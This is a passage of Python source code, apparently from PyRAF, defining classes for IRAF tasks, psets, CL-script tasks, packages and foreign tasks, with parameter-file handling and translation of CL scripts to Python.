sys.stderr.write(f\"Task {self._name} has no parameter file\\n\")\n sys.stderr.flush()\n\n def eParam(self):\n \"\"\"Edit the task parameters, PyRAF Tk style\"\"\"\n self.initTask(force=1)\n # XXX always runs on current par list, not running par list?\n if self._currentParList:\n from . import epar\n epar.epar(self)\n else:\n sys.stderr.write(f\"Task {self._name} has no parameter file\\n\")\n sys.stderr.flush()\n\n def tParam(self):\n \"\"\"Edit the task parameters, IRAF curses style\"\"\"\n self.initTask(force=1)\n # XXX always runs on current par list, not running par list?\n if self._currentParList:\n from . import tpar\n tpar.tpar(self)\n else:\n sys.stderr.write(f\"Task {self._name} has no parameter file\\n\")\n sys.stderr.flush()\n\n def dParam(self, cl=1):\n \"\"\"Dump the task parameters\n\n Default is to write CL version of code; if cl parameter is\n false, writes Python executable code instead.\n \"\"\"\n self.initTask(force=1)\n plist = self._runningParList or self._currentParList\n if plist:\n if cl:\n taskname = self._name\n else:\n taskname = f\"iraf.{self._name}\"\n plist.dParam(taskname, cl=cl)\n else:\n sys.stderr.write(f\"Task {self._name} has no parameter file\\n\")\n sys.stderr.flush()\n\n def saveParList(self, filename=None, comment=None):\n \"\"\"Write task parameters in .par format to filename (name or handle)\n\n If filename is omitted, writes to uparm scrunch file (if possible)\n Returns a string with the results.\n \"\"\"\n self.initTask()\n # XXX always runs on current par list, not running par list?\n if not self._currentParList:\n return f\"No parameters to save for task {self._name}\"\n if filename is None:\n if self._scrunchParpath:\n filename = self._scrunchParpath\n else:\n status = f\"Unable to save parameters for task {self._name}\"\n if Verbose > 0:\n print(status, file=sys.stderr)\n return status\n rv = self._currentParList.saveParList(filename, comment)\n return rv\n\n def unlearn(self):\n \"\"\"Reset task parameters to their default values\"\"\"\n self.initTask(force=1)\n # XXX always runs on current par list, not running par list?\n if not self._currentParList:\n return\n if self._defaultParList is not None:\n # update defaultParList from file if necessary\n self._defaultParList.Update()\n if self._scrunchParpath and \\\n (self._scrunchParpath == self._currentParpath):\n try:\n os.remove(iraf.Expand(self._scrunchParpath, noerror=1))\n except OSError:\n pass\n self._currentParList = copy.deepcopy(self._defaultParList)\n self._currentParpath = self._defaultParpath\n else:\n raise IrafError(\"Cannot find default .par file for task \" +\n self._name)\n\n def scrunchName(self):\n \"\"\"Return scrunched version of filename (used for uparm files)\n\n Scrunched version of filename is chars 1,2,last from package\n name and chars 1-5,last from task name.\n \"\"\"\n s = self._pkgname[0:2]\n if len(self._pkgname) > 2:\n s = s + self._pkgname[-1:]\n s = s + self._name[0:5]\n if len(self._name) > 5:\n s = s + self._name[-1:]\n return s\n\n # =========================================================\n # special methods to give desired object syntax\n # =========================================================\n\n # parameters are accessible as attributes\n\n def __getattr__(self, name):\n if name[:1] == '_':\n raise AttributeError(name)\n self.initTask()\n try:\n return self.getParam(name, native=1)\n except SyntaxError as e:\n raise AttributeError(str(e))\n\n def __setattr__(self, name, value):\n # hidden Python parameters go into the standard dictionary\n # (hope there are none of these in IRAF tasks)\n if name[:1] == '_':\n self.__dict__[name] = value\n elif self.is_pseudo(name):\n self.__dict__[name] = value\n else:\n self.initTask()\n self.setParam(name, value)\n\n def is_pseudo(self, paramname):\n \"\"\"Hook enabling ECL pseudos... always returns False\"\"\"\n return False\n\n # allow running task using taskname() or with\n # parameters as arguments, including keyword=value form.\n\n def __call__(self, *args, **kw):\n return self.run(*args, **kw)\n\n def __repr__(self):\n s = (f'<{self.__class__.__name__} {self._name} ({self._filename}) '\n f'Pkg: {self._pkgname} Bin: {\":\".join(self._pkgbinary)}')\n if self._foreign:\n s = s + ' Foreign'\n if self._hidden:\n s = s + ' Hidden'\n if self._hasparfile == 0:\n s = s + ' No parfile'\n if self._tbflag:\n s = s + ' .tb'\n return s + '>'\n\n def __str__(self):\n return repr(self)\n\n # =========================================================\n # private methods -- may be used by subclasses, but should\n # not be needed outside this module\n # =========================================================\n\n def _specialKW(self, kw):\n \"\"\"Return dictionary of any special keywords (subclass hook)\"\"\"\n return {}\n\n def _applyRedir(self, redirKW):\n \"\"\"Apply I/O redirection (irafexecute does this for executables)\n\n Return a list of redirections that need to be restored when done.\n \"\"\"\n return []\n\n def _resetRedir(self, resetList, closeFHList):\n \"\"\"Restore redirected I/O and close files\"\"\"\n return iraf.redirReset(resetList, closeFHList)\n\n def _run(self, redirKW, specialKW):\n \"\"\"Execute task after parameters, I/O redirection are prepared.\n\n The implementation of this can differ for each type of task.\n \"\"\"\n try:\n irafexecute.IrafExecute(self, iraf.getVarDict(), **redirKW)\n except irafexecute.IrafProcessError as value:\n raise IrafError(\"Error running IRAF task \" + self._name + \"\\n\" +\n str(value))\n\n def _updateParList(self, save=0):\n \"\"\"Update parameter list after successful task completion\n\n Updates parameter save file if any parameters change. If save\n flag is set, all changes are saved; if save flag is false, only\n explicit parameter changes requested by the task are saved.\n \"\"\"\n if not (self._currentParList and self._runningParList):\n return\n newParList = self._runningParList\n self._runningParList = None\n mode = self.getMode(newParList)\n changed = 0\n for par in newParList.getParList():\n if par.name != \"$nargs\" and (par.isChanged() or\n (save and par.isCmdline() and\n par.isLearned(mode))):\n changed = 1\n # get task parameter object\n tpar = self._currentParList.getParObject(par.name)\n # set its value -- don't bother with type checks since\n # the new and old parameters must be identical\n tpar.value = par.value\n # propagate other mutable fields too\n # don't propagate modes since I changed them\n # (note IRAF does not propagate prompt, which I consider a bug)\n tpar.min = par.min\n tpar.max = par.max\n tpar.choice = par.choice\n tpar.prompt = par.prompt\n tpar.setChanged()\n if isinstance(par, irafpar.IrafParPset):\n par.get()._updateParList(save)\n # save to disk if there were changes\n if changed:\n rv = self.saveParList()\n if Verbose > 1:\n print(rv, file=sys.stderr)\n\n def _deleteRunningParList(self):\n \"\"\"Delete the _runningParList parameter list for this and psets\"\"\"\n if self._currentParList and self._runningParList:\n newParList = self._runningParList\n self._runningParList = None\n for par in newParList.getParList():\n if isinstance(par, irafpar.IrafParPset):\n par.get()._deleteRunningParList()\n\n def _setParDictList(self):\n \"\"\"Set the list of (up to 3) parameter dictionaries for task execution.\n\n Parameter dictionaries for execution consist of this\n task's parameters (which includes any psets\n referenced), all the parameters for the task of the package\n loaded for the current task, and the cl parameters. Each\n dictionary has an associated name (because parameters could be\n asked for as task.parname as well as just parname).\n\n Create this list anew for each execution in case the\n list of loaded packages has changed. It is stored as\n an attribute of this object so it can be accessed by\n the getParam() and setParam() methods.\n \"\"\"\n\n # Start with the parameters for the current task\n self.initTask()\n parDictList = [(self._name, self.getParDict())]\n\n # Next, parameters from the package to which the current task belongs\n # [Ticket 59: mimic behavior of param.c:lookup_param()]\n task = iraf.getTask(self.getPkgname())\n pd = task.getParDict()\n if pd: # do not include null dictionaries\n parDictList.append((self.getPkgname(), pd))\n\n # Lastly, cl parameters\n cl = iraf.cl\n if cl is not None:\n parDictList.append((cl.getName(), cl.getParDict()))\n\n # Done\n self._parDictList = parDictList\n\n def _getParFromDict(self, paramdict, paramname, pindex, field, native,\n mode, prompt):\n # helper method for getting parameter value (with indirection)\n # once we find a dictionary that contains it\n par = paramdict[paramname]\n pmode = par.mode[:1]\n if pmode == \"a\":\n pmode = mode or self.getMode()\n v = par.get(index=pindex,\n field=field,\n native=native,\n mode=pmode,\n prompt=prompt)\n if isinstance(v, str) and v[:1] == \")\":\n\n # parameter indirection: call getParam recursively\n # I'm making the assumption that indirection in a\n # field (e.g. in the min or max value) is allowed\n # and that it uses exactly the same syntax as\n # the argument to getParam, i.e. ')task.param'\n # refers to the p_value of the parameter,\n # ')task.param.p_min' refers to the min or\n # choice string, etc.\n\n return self.getParam(v[1:], native=native, mode=\"h\", prompt=prompt)\n else:\n return v\n\n def _initFullpath(self):\n \"\"\"Fill in full pathname of executable\"\"\"\n\n # This follows the search strategy used by findexe in\n # cl/exec.c: first it checks in the BIN directory for the\n # \"installed\" version of the executable, and if that is not\n # found it tries the pathname given in the TASK declaration.\n # Expand iraf variables. We will try both paths if the expand fails.\n try:\n exename1 = iraf.Expand(self._filename)\n # get name of executable file without path\n basedir, basename = os.path.split(exename1)\n except IrafError as e:\n if Verbose > 0:\n print(\"Error searching for executable for: \" + self._name,\n file=sys.stderr)\n print(str(e), file=sys.stderr)\n exename1 = \"\"\n # make our best guess that the basename is what follows the\n # last '$' in _filename\n s = self._filename.split(\"$\")\n basename = s[-1]\n if basename == \"\":\n self._fullpath = \"\"\n raise IrafError(f\"No filename in task {self._name} definition: \"\n f\"`{self._filename}'\")\n # for foreign tasks, just set path to filename (XXX will\n # want to improve this by checking os path for existence)\n if self._foreign:\n self._fullpath = self._filename\n else:\n # first look in the task binary directories\n exelist = []\n for pbin in self._pkgbinary: # e.g. ['bin$']\n try:\n exelist.append(iraf.Expand(pbin + basename))\n except IrafError as e:\n if Verbose > 0:\n print(\"Error finding executable for: \" + self._name,\n file=sys.stderr)\n print(str(e), file=sys.stderr)\n for exename2 in exelist:\n if os.path.exists(exename2):\n self._fullpath = exename2\n break\n else:\n if os.path.exists(exename1):\n self._fullpath = exename1\n else:\n self._fullpath = \"\"\n exelist.append(exename1)\n raise IrafError(\n f\"Cannot find executable for task {self._name}\\n\"\n f\"Tried \" + \", \".join(exelist))\n\n def _initParpath(self):\n \"\"\"Initialize parameter file paths\"\"\"\n\n if not self._filename:\n # if filename is missing we won't be able to find parameter file\n # set hasparfile flag to zero if that is OK\n self._noParFile()\n self._hasparfile = 0\n\n if not self._hasparfile:\n # no parameter file\n self._defaultParpath = \"\"\n self._currentParpath = \"\"\n self._scrunchParpath = \"\"\n return\n\n try:\n exename1 = iraf.Expand(self._filename)\n basedir, basename = os.path.split(exename1)\n if basedir == \"\":\n basedir = \".\"\n except IrafError as e:\n if Verbose > 0:\n print(\"Error expanding executable name for task \" +\n self._name + \", tried: \" + self._filename,\n file=sys.stderr)\n print(str(e), file=sys.stderr)\n exename1 = \"\"\n basedir = \"\"\n\n # default parameters are found with task\n self._defaultParpath = os.path.join(basedir, self._name + \".par\")\n if not os.path.exists(iraf.Expand(self._defaultParpath, noerror=1)):\n self._noParFile()\n self._defaultParpath = \"\"\n\n # uparm has scrunched version of par filename with saved parameters\n # (also handle if they forgot the end-slash on the uparm var)\n self._scrunchParpath = \"uparm$/\" + self.scrunchName() + \".par\"\n\n def _noParFile(self):\n \"\"\"Decide what to do if .par file is not found\"\"\"\n # Here I raise an exception, but subclasses (e.g., CL tasks)\n # can do something different.\n raise IrafError(\"Cannot find .par file for task \" + self._name +\n \", tried: \" + self._defaultParpath + \", for file: \" +\n self._filename)\n\n def _initParList(self):\n \"\"\"Initialize parameter list by reading parameter file\"\"\"\n\n if not self._hasparfile:\n return\n\n self._defaultParList = irafpar.IrafParList(\n self._name, iraf.Expand(self._defaultParpath, noerror=1))\n\n codePath = 'a'\n if self._scrunchParpath and os.path.exists(\n iraf.Expand(self._scrunchParpath, noerror=1)):\n self._currentParpath = self._scrunchParpath\n self._currentParList = irafpar.IrafParList(\n self._name, iraf.Expand(self._currentParpath, noerror=1))\n # are lists consistent?\n if not self._isConsistentPar():\n sys.stderr.write(\"uparm parameter list \"\n f\"`{self._currentParpath}' inconsistent with \"\n \"default parameters for \"\n f\"{self.__class__.__name__} `{self._name}'\\n\")\n sys.stderr.flush()\n # XXX just toss it for now -- later can try to merge new,old\n try:\n os.remove(iraf.Expand(self._scrunchParpath, noerror=1))\n except OSError:\n pass\n self._currentParpath = self._defaultParpath\n self._currentParList = copy.deepcopy(self._defaultParList)\n else:\n self._currentParpath = self._defaultParpath\n self._currentParList = copy.deepcopy(self._defaultParList)\n codePath = 'b'\n\n assert self._defaultParList._dlen() == \\\n self._currentParList._dlen(), \"Bad deep copy? \"+ \\\n str(self._defaultParList._dlen())+\" != \"+ \\\n str(self._currentParList._dlen())+\", cpath=\"+codePath\n\n def _isConsistentPar(self):\n \"\"\"Check current par list and default par list for consistency\"\"\"\n return (not self._currentParList) or \\\n self._currentParList.isConsistent(self._defaultParList)\n\n\n# -----------------------------------------------------\n# IRAF graphics kernel class\n# -----------------------------------------------------\n\n\nclass IrafGKITask(IrafTask):\n \"\"\"IRAF graphics kernel class (special case of IRAF task)\"\"\"\n\n def __init__(self, name, filename):\n \"\"\"Initialize: only name and executable filename are needed\"\"\"\n IrafTask.__init__(self, '', name, '', filename, 'clpackage', 'bin$')\n self.setHidden()\n # all graphics kernel tasks have the same parameters\n pars = irafpar.IrafParList(name)\n makepar = irafpar.makeIrafPar\n pars.addParam(makepar('', datatype='string', name='input', mode='ql'))\n pars.addParam(makepar('', datatype='string', name='device', mode='h'))\n pars.addParam(makepar('yes', datatype='bool', name='generic',\n mode='h'))\n self._defaultParList = pars\n self._currentParList = pars\n\n def saveParList(self, filename=None):\n \"\"\"Never save parameters for kernels\"\"\"\n return \"\"\n\n\n# -----------------------------------------------------\n# IRAF Pset class\n# -----------------------------------------------------\n\n\nclass IrafPset(IrafTask):\n \"\"\"IRAF pset class (special case of IRAF task)\"\"\"\n\n def __init__(self, prefix, name, suffix, filename, pkgname, pkgbinary):\n IrafTask.__init__(self, prefix, name, suffix, filename, pkgname,\n pkgbinary)\n # check that parameters are consistent with pset:\n # - not a foreign task\n # - has a parameter file\n if self.getForeign():\n raise IrafError(\n f\"Bad filename for pset {self.getName()}: {filename}\")\n if not self.hasParfile():\n raise KeyError(f\"Pset {self.getName()} has no parameter file\")\n\n def _run(self, redirKW, specialKW):\n # executing a pset\n self.eParam() # the cl runs the param editor here; so shall we\n\n def __str__(self):\n # when coerced to a string, pset is name of task\n # this makes assignment of a pset to a string do the right thing\n return self.getName()\n\n\n# -----------------------------------------------------\n# IRAF Python task class\n# -----------------------------------------------------\n\n\nclass IrafPythonTask(IrafTask):\n \"\"\"IRAF Python task class\"\"\"\n\n def __init__(self, prefix, name, suffix, filename, pkgname, pkgbinary,\n function):\n # filename is the .par file for this task\n IrafTask.__init__(self, prefix, name, suffix, filename, pkgname,\n pkgbinary)\n if self.getForeign():\n raise IrafError(f\"Python task `{self.getName()}' cannot be foreign\"\n f\" (filename=`{filename}')\")\n self.__dict__['_pyFunction'] = function\n\n def isConsistent(self, other):\n \"\"\"Returns true if this task is consistent with another task object\"\"\"\n return IrafTask.isConsistent(self, other) and \\\n self._pyFunction == other._pyFunction\n\n # =========================================================\n # special methods\n # =========================================================\n\n def __getstate__(self):\n \"\"\"Return state for pickling\n\n Note that __setstate__ is not needed because\n returned state is a dictionary\n \"\"\"\n\n # Dictionary is OK except for function pointer, which can't\n # be restored unless function is in the pyraf package\n if self._pyFunction is None:\n return self.__dict__\n try:\n module = self._pyFunction.__globals__['__name__']\n if module[:6] == 'pyraf.':\n return self.__dict__\n except KeyError:\n pass\n # oh well, replace _pyFunction in shallow copy of dictionary\n sdict = self.__dict__.copy()\n sdict['_pyFunction'] = None\n return sdict\n\n # =========================================================\n # private methods\n # =========================================================\n\n def _applyRedir(self, redirKW):\n \"\"\"Apply I/O redirection\"\"\"\n return iraf.redirApply(redirKW)\n\n def _run(self, redirKW, specialKW):\n \"\"\"Execute task after parameters, I/O redirection are prepared.\"\"\"\n # extract all parameters\n parList = self.getParList()\n pl = []\n for par in parList:\n if par.name not in ['mode', '$nargs']:\n if isinstance(par, irafpar.IrafParL):\n # list parameters get passed as objects\n pl.append(par)\n elif par.mode == \"h\" and not par.isLegal():\n # illegal hidden value (generally undefined) passed as None\n pl.append(None)\n else:\n # other parameters get passed by value\n pl.append(par.get(native=1))\n # run function on the parameters\n self._pyFunction(*pl)\n\n\n# -----------------------------------------------------\n# parDictList search class (helper for IrafCLTask)\n# -----------------------------------------------------\n\n\nclass ParDictListSearch:\n\n def __init__(self, taskObj):\n self.__dict__['_taskObj'] = taskObj\n\n def __getattr__(self, paramname):\n if self._taskObj.is_pseudo(paramname):\n return getattr(self._taskObj, paramname)\n if paramname[:1] == '_':\n raise AttributeError(paramname)\n # try exact match\n try:\n return self._taskObj.getParam(paramname,\n native=1,\n mode=\"h\",\n exact=1)\n except IrafError:\n pass\n # try minimum match\n try:\n p = self._taskObj.getParObject(paramname, alldict=1)\n except IrafError as e:\n # not found at all\n raise AttributeError(str(e))\n # it was found, but we don't allow min-match in CL scripts\n # print a more useful message\n raise AttributeError(f\"Unknown parameter `{paramname}' \"\n f\"(possibly intended `{p.name}'?)\")\n\n def getParObject(self, paramname):\n # try exact match\n try:\n return self._taskObj.getParObject(paramname, exact=1, alldict=1)\n except IrafError:\n pass\n # try minimum match\n try:\n p = self._taskObj.getParObject(paramname, alldict=1)\n except IrafError as e:\n # not found at all\n raise AttributeError(str(e))\n # it was found, but we don't allow min-match in CL scripts\n # print a more useful message\n raise AttributeError(f\"Unknown parameter `{paramname}' \"\n f\"(possibly intended `{p.name}'?)\")\n\n def __setattr__(self, paramname, value):\n if self._taskObj.is_pseudo(paramname):\n return setattr(self._taskObj, paramname, value)\n if paramname[:1] == '_':\n raise AttributeError(paramname)\n # try exact match\n try:\n return self._taskObj.setParam(paramname, value, exact=1)\n except IrafError:\n pass\n # try minimum match\n try:\n p = self._taskObj.getParObject(paramname, alldict=1)\n except IrafError as e:\n # not found at all\n raise AttributeError(str(e))\n # it was found, but we don't allow min-match in CL scripts\n # print a more useful message\n raise AttributeError(f\"Unknown parameter `{paramname}' \"\n f\"(possibly intended `{p.name}'?)\")\n\n\n# -----------------------------------------------------\n# IRAF CL task class\n# -----------------------------------------------------\n\n\nclass IrafCLTask(IrafTask):\n \"\"\"IRAF CL task class\"\"\"\n\n def __init__(self, prefix, name, suffix, filename, pkgname, pkgbinary):\n # allow filename to be a filehandle or a filename\n if isinstance(filename, str):\n fh = None\n else:\n if not hasattr(filename, 'read'):\n raise TypeError(\n 'filename must be either a string or a filehandle')\n fh = filename\n if hasattr(fh, 'name'):\n filename = fh.name\n else:\n filename = None\n IrafTask.__init__(self, prefix, name, suffix, filename, pkgname,\n pkgbinary)\n if self.getForeign():\n raise IrafError(f\"CL task `{self.getName()}' cannot be foreign \"\n f\"(filename=`{filename}')\")\n # placeholder for Python translation of CL code\n # (lazy instantiation)\n self.__dict__['_pycode'] = None\n self.__dict__['_codeObject'] = None\n self.__dict__['_clFunction'] = None\n if fh is not None:\n # if filehandle was specified, go ahead and do the\n # initialization now\n self.initTask(filehandle=fh)\n\n # =========================================================\n # new public methods for CL task\n # =========================================================\n\n def getCode(self):\n \"\"\"Return a string with the Python code for this task\"\"\"\n self.initTask(force=1)\n return self._pycode.code\n\n def reCompile(self):\n \"\"\"Force recompilation of CL code\"\"\"\n if self._pycode is not None:\n self._pycode.index = None\n cl2py.codeCache.remove(self)\n self.initTask(force=1)\n\n # =========================================================\n # other public methods\n # =========================================================\n\n def initTask(self, force=0, filehandle=None):\n \"\"\"Fill in full pathnames of files, read par file, compile CL code\n\n If filehandle is specified, reads CL code from there\n \"\"\"\n\n if (not force) and (self._pycode is not None):\n # quick return if recheck of source code is not forced\n return\n\n if self._filename is None and filehandle is None and \\\n self._pycode is not None:\n # another quick return -- if filename and filehandle are\n # both None and pycode is defined, input must have come\n # from a filehandle. Then pycode does not need to be\n # recreated (and in fact, it cannot be recreated.)\n return\n\n if filehandle is not None and self._filename:\n self._fullpath = iraf.Expand(self._filename)\n\n IrafTask.initTask(self)\n\n if filehandle is None:\n filehandle = self._fullpath or self._filename\n\n if not cl2py.checkCache(filehandle, self._pycode):\n # File has changed, force recompilation\n self._pycode = None\n if Verbose > 1:\n print(\"Cached version out-of-date: \" + self._name,\n file=sys.stderr)\n\n if self._pycode is None:\n # translate code to python\n if Verbose > 1:\n print(\"Compiling CL task \",\n self._name,\n id(self),\n file=sys.stderr)\n self._codeObject = None\n self._pycode = cl2py.cl2py(filehandle,\n parlist=self._defaultParList,\n parfile=self._defaultParpath)\n\n if self._codeObject is None:\n # No code object, which can happen if function has not\n # been compiled or if compilation failed. Try compiling\n # again in any case.\n self._clFunction = None\n if self._pkgname:\n scriptname = f''\n else:\n # null pkgname -- just use task in name\n scriptname = f''\n # force compile to inherit future div. so we don't rely on 2.x div.\n self._codeObject = compile(self._pycode.code, scriptname, 'exec',\n 0, 0)\n\n if self._clFunction is None:\n # Execute the code to define the Python function in clDict\n clDict = {}\n exec(self._codeObject, clDict)\n self._clFunction = clDict[self._pycode.vars.proc_name]\n\n # get parameter list from CL code\n # This may replace an existing list -- that's OK since\n # the cl2py code has already checked it for consistency.\n self._defaultParList = self._pycode.vars.parList\n # use currentParList from .par file if exists and consistent\n if self._currentParpath:\n if not self._defaultParList.isConsistent(self._currentParList):\n sys.stderr.write(\n f\"uparm parameter list `{self._currentParpath}' \"\n \"inconsistent with default parameters for \"\n f\"{self.__class__.__name__} `{self._name}'\\n\")\n sys.stderr.flush()\n # XXX just toss it for now -- later can try to merge new,old\n if self._currentParpath == self._scrunchParpath:\n try:\n os.remove(iraf.Expand(self._scrunchParpath,\n noerror=1))\n except OSError:\n pass\n self._currentParpath = self._defaultParpath\n self._currentParList = copy.deepcopy(self._defaultParList)\n else:\n self._currentParList = copy.deepcopy(self._pycode.vars.parList)\n self._currentParpath = self._defaultParpath\n\n # =========================================================\n # special methods\n # =========================================================\n\n def __getstate__(self):\n \"\"\"Return state for pickling\"\"\"\n # Dictionary is OK except for function pointer\n # Note that __setstate__ is not needed because\n # returned state is a dictionary\n if self._clFunction is None:\n return self.__dict__\n # replace _clFunction in shallow copy of dictionary\n sdict = self.__dict__.copy()\n sdict['_clFunction'] = None\n return sdict\n\n # =========================================================\n # private methods\n # =========================================================\n\n def _applyRedir(self, redirKW):\n \"\"\"Apply I/O redirection\"\"\"\n return iraf.redirApply(redirKW)\n\n def _run(self, redirKW, specialKW):\n \"\"\"Execute task after parameters, I/O redirection are prepared.\"\"\"\n self._runCode()\n\n def _runCode(self, parList=None, kw={}):\n \"\"\"Run the procedure with current parameters\"\"\"\n # add the searchable task object to keywords\n kw['taskObj'] = ParDictListSearch(self)\n if parList is None:\n parList = self.getParList()\n # XXX\n # It might be better to pass all parameters as\n # keywords instead of as positional arguments?\n # That would be more robust against some errors\n # but would also not allow certain IRAF-like\n # behaviors (where the .par file gives a different\n # name for the parameter.)\n # XXX\n self._clFunction(*parList, **kw)\n\n def _noParFile(self):\n \"\"\"Decide what to do if .par file is not found\"\"\"\n # For CL tasks, it is OK if no .par\n pass\n\n def _isConsistentPar(self):\n \"\"\"Check current par list and default par list for consistency\"\"\"\n # they do not have to be consistent for CL task (at least not\n # where this is called, in IrafTask.initTask).\n # XXX This is a bit lax, eh? Need something a bit stricter.\n return 1\n\n\n def isConsistent(self, other):\n \"\"\"Returns true if this task is consistent with another task object\"\"\"\n if self.getFilename() is not None or other.getFilename() is not None:\n return IrafTask.isConsistent(self, other)\n else:\n return self._pycode == other._pycode\n\n# -----------------------------------------------------\n# IRAF package class\n# -----------------------------------------------------\n\n# use empty \"tag\" class from irafglobals as base class\n\n\nclass IrafPkg(IrafCLTask, irafglobals.IrafPkg):\n \"\"\"IRAF package class (special case of IRAF task)\"\"\"\n\n def __init__(self, prefix, name, suffix, filename, pkgname, pkgbinary):\n IrafCLTask.__init__(self, prefix, name, suffix, filename, pkgname,\n pkgbinary)\n self._loaded = 0\n self._tasks = minmatch.MinMatchDict()\n self._subtasks = minmatch.MinMatchDict()\n self._pkgs = minmatch.MinMatchDict()\n\n # =========================================================\n # new public methods for package\n # =========================================================\n\n def __str__(self):\n \"\"\" Describe this object. \"\"\"\n retval = \"IrafPkg: name=\"+self.getName()+\", pkg=\"+self.getPkgname()+ \\\n \", file=\"+self.getFilename()+\"\\n\"\n retval += \"tasks: \" + str(self._tasks) + \"\\n\"\n retval += \"subtasks: \" + str(self._subtasks) + \"\\n\"\n retval += \"packages: \" + str(self._pkgs) + \"\\n\"\n return retval\n\n def isLoaded(self):\n \"\"\"Returns true if this package has already been loaded\"\"\"\n return self._loaded\n\n def addTask(self, task, fullname):\n \"\"\"Add a task to the task list for this package\n\n Just store the name of the task to avoid cycles\n \"\"\"\n name = task.getName()\n self._tasks.add(name, fullname)\n # sub-packages get added to a separate list\n if isinstance(task, IrafPkg):\n self._pkgs.add(name, name)\n\n # =========================================================\n # other public methods\n # =========================================================\n\n def getAllMatches(self, name, triedpkgs=None):\n \"\"\"Return list of names of all parameters/tasks that may match name\"\"\"\n self.initTask(force=1)\n plist = self._runningParList or self._currentParList\n if plist:\n matches = plist.getAllMatches(name)\n else:\n matches = []\n if self._loaded:\n # tasks in this package\n if name == \"\":\n matches.extend(list(self._tasks.keys()))\n else:\n matches.extend(self._tasks.getallkeys(name, []))\n # tasks in subpackages\n if not triedpkgs:\n triedpkgs = {}\n triedpkgs[id(self)] = 1\n getPkg = iraf.getPkg\n getTried = triedpkgs.get\n for fullname in self._pkgs.values():\n p = getPkg(fullname)\n if p._loaded and (not getTried(id(p))):\n try:\n matches.extend(\n p.getAllMatches(name, triedpkgs=triedpkgs))\n except AttributeError:\n pass\n return matches\n\n def unlearn(self):\n \"\"\"Resets parameters for all tasks in the package to their default values\"\"\"\n # If package isn't loaded, just unlearn the top-level package parameters,\n # otherwise unlearn top-level ones AND all sub tasks.\n IrafCLTask.unlearn(self)\n if self._loaded:\n # Loop over all tasks in the package\n for task in self._tasks.keys():\n iraf.getTask(task).unlearn()\n\n def __getattr__(self, name):\n \"\"\"Return the task or param 'name' from this package (if it exists).\"\"\"\n if name[:1] == '_':\n raise AttributeError(name)\n self.initTask()\n # return package parameter if it exists\n plist = self._runningParList or self._currentParList\n if plist and plist.hasPar(name):\n return plist.getValue(name, native=1, mode=self.getMode())\n # else search for task with the given name\n if not self._loaded:\n raise AttributeError(\"Package \" + self.getName() +\n \" has not been loaded; no tasks are defined\")\n fullname = self._getTaskFullname(name)\n if fullname:\n return iraf.getTask(fullname)\n else:\n raise AttributeError(f\"Parameter {name} not found\")\n\n # =========================================================\n # private methods\n # =========================================================\n\n def _getTaskFullname(self, name, triedpkgs=None):\n \"\"\"Return the full name (pkg.task) of task 'name' from this package\n\n Returns None if task is not found.\n\n Also searches subpackages for the task. triedpkgs is\n a dictionary with all the packages that have already been\n tried. It is used to avoid infinite recursion when\n packages contain themselves.\n\n Tasks that are found are added to _tasks dictionary to speed\n repeated searches.\n \"\"\"\n if not self._loaded:\n return None\n task = self._tasks.get(name)\n if task:\n return task\n # try subpackages\n task = self._subtasks.get(name)\n if task:\n return task\n # search subpackages\n if not triedpkgs:\n triedpkgs = {}\n triedpkgs[id(self)] = 1\n getPkg = iraf.getPkg\n getTried = triedpkgs.get\n for fullname in self._pkgs.values():\n p = getPkg(fullname)\n if p._loaded and (not getTried(id(p))):\n task = p._getTaskFullname(name, triedpkgs=triedpkgs)\n if task:\n self._subtasks.add(name, task)\n return task\n return None\n\n def _specialKW(self, kw):\n \"\"\"Handle special _doprint, _hush keywords\"\"\"\n\n # Special _hush keyword is used to suppress most output when loading\n # packages. Default is to print output.\n # Implement by redirecting stdout to /dev/null (but don't override\n # other redirection requests)\n if '_hush' in kw:\n if kw['_hush'] and \\\n not (('Stdout' in kw) or ('StdoutAppend' in kw)):\n kw['Stdout'] = '/dev/null'\n del kw['_hush']\n # Special _doprint keyword is used to control whether tasks are listed\n # after package has been loaded. Default is to list them if cl.menus\n # is set, or not to list them if it is not set.\n if '_doprint' in kw:\n doprint = kw['_doprint']\n del kw['_doprint']\n else:\n doprint = iraf.cl.menus\n return {'doprint': doprint}\n\n def _run(self, redirKW, specialKW):\n \"\"\"Execute task after parameters, I/O redirection are prepared.\"\"\"\n doprint = specialKW['doprint']\n # if already loaded, just add to iraf.loadedPath\n iraf.loadedPath.append(self)\n if not self._loaded:\n self._loaded = 1\n iraf.addLoaded(self)\n if Verbose > 1:\n print(\"Loading pkg: \" + self.getName() + \"(\" +\n self.getFullpath() + \")\",\n file=sys.stderr)\n menus = iraf.cl.menus\n try:\n iraf.cl.menus = 0\n self._runCode()\n # if other packages were loaded, put this on the\n # loadedPath list one more time\n if iraf.loadedPath[-1] is not self:\n iraf.loadedPath.append(self)\n if doprint:\n iraf.listTasks(self)\n finally:\n iraf.cl.menus = menus\n\n # -----------------------------------------------------\n # Turn an IrafCLTask into an IrafPkg\n # This is necessary because sometimes package scripts\n # are incorrectly defined as simple CL tasks. (Currently\n # the only example I know of is the imred/ccdred/ccdtest\n # package, but there could be others.) Need to keep\n # the same object (because there may be multiple references\n # to it) but repair the mistake by changing its class.\n #\n # A bit scary, but it works (at least in the current version\n # of Python.)\n #\n # This doesn't do everything that might be necessary. E.g., it does\n # not print the package contents after loading and does not put the\n # package on the list of loaded pcakges. Leave that up to the calling\n # routine.\n # -----------------------------------------------------\n\n\ndef mutateCLTask2Pkg(o, loaded=1, klass=IrafPkg):\n \"\"\"Hack an IRAF CL task object into an IRAF package object\"\"\"\n\n if isinstance(o, IrafPkg):\n return\n if not isinstance(o, IrafCLTask):\n raise TypeError(\"Cannot turn object `{repr(o)}' into an IrafPkg\")\n\n # add the extra attributes used in IrafPkg\n # this is usually called while actually loading the package, so by\n # default loaded flag is set to true\n o._loaded = loaded\n o._tasks = minmatch.MinMatchDict()\n o._pkgs = minmatch.MinMatchDict()\n\n # Presto, you're an IrafPkg!\n o.__class__ = klass\n\n\n# -----------------------------------------------------\n# IRAF foreign task class\n# -----------------------------------------------------\n\n# regular expressions for parameter substitution\n_re_foreign_par = re.compile(r'\\$' + r'((?P[0-9]+)' + r'|(?P\\*)' +\n r'|(\\((?P[0-9]+)\\))' +\n r'|(\\((?P\\*)\\))' + r')')\n\n\nclass IrafForeignTask(IrafTask):\n \"\"\"IRAF foreign task class\"\"\"\n\n def __init__(self, prefix, name, suffix, filename, pkgname, pkgbinary):\n IrafTask.__init__(self, prefix, name, suffix, filename, pkgname,\n pkgbinary)\n # check that parameters are consistent with foreign task:\n # - foreign flag set\n # - no parameter file\n if not self.getForeign():\n raise IrafError(f\"Bad filename for foreign 